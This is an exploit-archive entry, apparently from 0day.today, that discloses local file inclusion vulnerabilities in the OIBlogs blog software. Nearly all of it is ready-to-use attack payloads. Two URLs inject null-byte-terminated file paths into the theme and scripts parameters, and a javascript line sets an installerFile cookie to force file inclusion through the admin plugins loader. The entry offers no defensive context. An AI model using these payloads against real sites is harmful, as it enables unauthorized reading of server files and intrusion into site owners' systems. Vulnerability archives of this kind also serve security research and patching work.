id: 11062
date: 02/24/2010
title: OIBlogs local file inclusion vulnerabilities
author: JiKo
cves: 

============================================
OIBlogs local file inclusion vulnerabilities
============================================

----------[exploit Debut]
[ Multiple Remote Vulnerabilities ]

----------[Script Info]

Script        : OIBlogs
Download    : http://www.openinferno.com/download/latest/zip

----------[exploit Info]

>>|~[Info]
http://No-exploit.Com/templates/loadStyles.php?theme=file%00
http://No-exploit.Com/sources/javascript/loadScripts.php?scripts=[file]%00

include all file
http://localhost/upload/admin/plugins/load.php
javascript:document.cookie="installerFile=[FIle];path=/upload/admin/plugins";




#  0day.today [2023-03-24]  #